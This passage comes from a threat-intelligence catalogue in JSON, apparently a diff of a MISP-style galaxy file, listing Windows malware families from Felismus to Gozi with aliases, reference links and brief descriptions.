"uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", - "value": "Felismus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", - "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", - "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" - ] - }, - "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", - "value": "Felixroot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Cridex", - "Bugat" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", - "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", - "https://feodotracker.abuse.ch/", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" - ] - }, - "uuid": "66781866-f064-467d-925d-5e5f290352f0", - "value": "Feodo", - "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", - "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" - ] - }, - "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", - "value": "FF RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", - "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" - ] - }, - "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", - "value": "FileIce", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Poseidon" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", - "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", - "https://blogs.cisco.com/security/talos/poseidon" - ] - }, - "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", - "value": "FindPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "FinSpy" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", - "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", - "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", - "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", - "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", - "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", - "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" - ] - }, - "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", - "value": "FinFisher RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", - "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" - ] - }, - "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", - "value": "Fireball", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", - "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" - ] - }, - "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", - "value": "FireCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" - ] - }, - "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", - "value": "FireMalv", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", - "https://twitter.com/JaromirHorejsi/status/815949909648150528" - ] - }, - "uuid": "1ab17959-6254-49af-af26-d34e87073e49", - "value": "FirstRansom", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", - "https://github.com/Coldzer0/Ammyy-v3", - "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" - ] - }, - "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", - "value": "FlawedAmmyy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - }, - "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", - "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", - "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", - "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", - "http://adelmas.com/blog/flokibot.php", - "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/", - "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", - "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", - "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/" - ] - }, - "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", - "value": "FlokiBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", - "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" - ] - }, - "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", - "value": "Floxif", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", - "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" - ] - }, - "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", - "value": "Flusihoc", - "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", - "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", - "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", - "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", - "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", - "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" - ] - }, - "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", - "value": "Fobber", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", - "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", - "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", - "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", - "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", - "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", - "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", - "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" - ] - }, - "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", - "value": "Formbook", - "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware." - }, - { - "meta": { - "synonyms": [ - "ffrat" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", - "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" - ] - }, - "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", - "value": "FormerFirstRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] - }, - "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", - "value": "Freenki Loader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "BitPaymer" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] - }, - "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", - "value": "FriedEx", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f", - "https://sentinelone.com/blogs/sfg-furtims-parent/" - ] - }, - "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", - "value": "Furtim", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" - ] - }, - "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", - "value": "GalaxyLoader", - "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n" - }, - { - "meta": { - "synonyms": [ - "pios" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", - "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" - ] - }, - "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", - "value": "gamapos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" - ] - }, - "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", - "value": "Gameover DGA", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ZeuS P2P", - "GOZ" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", - "https://www.wired.com/?p=2171700", - "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf", - "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", - "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", - "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf" - ] - }, - "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", - "value": "Gameover P2P", - "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" - ] - }, - "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", - "value": "Gamotrol", - "description": "" - }, - { - "meta": { - "synonyms": [ - "GrandCrab" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", - "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", - "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", - "http://asec.ahnlab.com/1145", - "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", - "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", - "https://isc.sans.edu/diary/23417", - "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", - "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", - "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/" - ] - }, - "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", - "value": "win.gandcrab", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", - "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" - ] - }, - "uuid": "591b2882-65ba-4629-9008-51ed3467510a", - "value": "Gaudox", - "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only)." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", - "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" - ] - }, - "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", - "value": "Gauss", - "description": "" - }, - { - "meta": { - "synonyms": [ - "WhiteBear" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", - "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", - "https://securelist.com/introducing-whitebear/81638/", - "https://www.youtube.com/watch?v=Pvzhtjl86wc", - "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", - "https://github.com/eset/malware-ioc/tree/master/turla" - ] - }, - "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", - "value": "Gazer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", - "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" - ] - }, - "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", - "value": "gcman", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", - "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html", - "https://www.rekings.com/ispy-customers/" - ] - }, - "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", - "value": "GearInformer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Emotet", - "Heodo" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", - "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", - "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", - "https://www.us-cert.gov/ncas/alerts/TA18-201A", - "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", - "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", - "https://feodotracker.abuse.ch/?filter=version_e", - "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", - "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" - ] - }, - "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", - "value": "Geodo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", - "value": "GetMail", - "description": "" - }, - { - "meta": { - "synonyms": [ - "getmypos" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", - "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", - "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html" - ] - }, - "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", - "value": "GetMyPass", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CoreImpact (Modified)" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", - "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://www.coresecurity.com/core-impact" - ] - }, - "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", - "value": "Ghole", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Remosh" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", - "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", - "https://en.wikipedia.org/wiki/GhostNet" - ] - }, - "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", - "value": "Gh0stnet", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Ghost iBot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", - "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", - "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" - ] - }, - "uuid": "6201c337-1599-4ced-be9e-651a624c20be", - "value": "GhostAdmin", - "description": "" - }, - { - "meta": { - "synonyms": [ - "PCRat", - "Gh0st RAT" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", - "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", - "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", - "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", - "http://www.malware-traffic-analysis.net/2018/01/04/index.html", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", - "http://www.hexblog.com/?p=1248", - "https://blog.cylance.com/the-ghost-dragon" - ] - }, - "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", - "value": "Ghost RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Wordpress Bruteforcer" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", - "https://forum.exploit.in/pda/index.php/t102378.html" - ] - }, - "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", - "value": "Glasses", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", - "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" - ] - }, - "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", - "value": "GlassRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", - "https://blog.ensilo.com/globeimposter-ransomware-technical", - "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", - "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", - "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", - "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", - "https://isc.sans.edu/diary/23417" - ] - }, - "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", - "value": "GlobeImposter", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" - ] - }, - "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", - "value": "Globe", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", - "value": "GlooxMail", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", - "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", - "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", - "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", - "http://resources.infosecinstitute.com/tdss4-part-1/" - ] - }, - "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", - "value": "win.glupteba", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" - ] - }, - "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", - "value": "Godzilla Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", - "value": "Goggles", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Petya/Mischa" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", - "http://www.threatgeek.com/2017/02/spying-on-goldeneye-ransomware.html", - "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] - }, - "uuid": "d7196f6a-757b-4124-ae28-f403e5d84fcb", - "value": "GoldenEye", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon", - "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] - }, - "uuid": "2297799c-f93c-4903-b9af-32b6b599912c", - "value": "GoldDragon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.golroted", - "http://www.vkremez.com/2017/11/lets-learn-dissecting-golroted-trojans.html" - ] - }, - "uuid": "9cd98c61-0dfa-4af6-b334-65eb43bc8d9d", - "value": "Golroted", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Fuerboos" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor", - "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control" - ] - }, - "uuid": "91b52a5f-420a-484b-8e1e-a91d402db6c5", - "value": "Goodor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.google_drive_rat", - "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf" - ] - }, - "uuid": "d1298818-6425-49be-9764-9f119d964efd", - "value": "GoogleDrive RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic", - "https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/" - ] - }, - "uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181", - "value": "GooPic Drooper", - "description": "" - }, - { - "meta": { - "synonyms": [ - "talalpek", - "Xswkit" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit", - "https://www.lexsi.com/securityhub/homer-simpson-brian-krebs-rencontrent-zeus-gootkit/", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", - "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/", - "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", - "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", - "https://www.us-cert.gov/ncas/alerts/TA16-336A", - "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/", - "https://www.youtube.com/watch?v=242Tn0IL2jE", - "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html", - "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", - "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html", - "https://news.drweb.com/show/?i=4338&lng=en", - "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/", - "https://www.youtube.com/watch?v=QgUlPvEE4aw", - "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" - ] - }, - "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", - "value": "GootKit", - "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat", - "https://www.yumpu.com/en/document/view/55930175/govrat-v20" - ] - }, - "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", - "value": "GovRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CRM", - "Gozi CRM", - "Papras", - "Snifula", - "Ursnif" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", - "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/", - "https://www.secureworks.com/research/gozi", - "https://lokalhost.pl/gozi_tree.txt", - "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html" - ] - }, - "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", - "value": "Gozi", - "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as 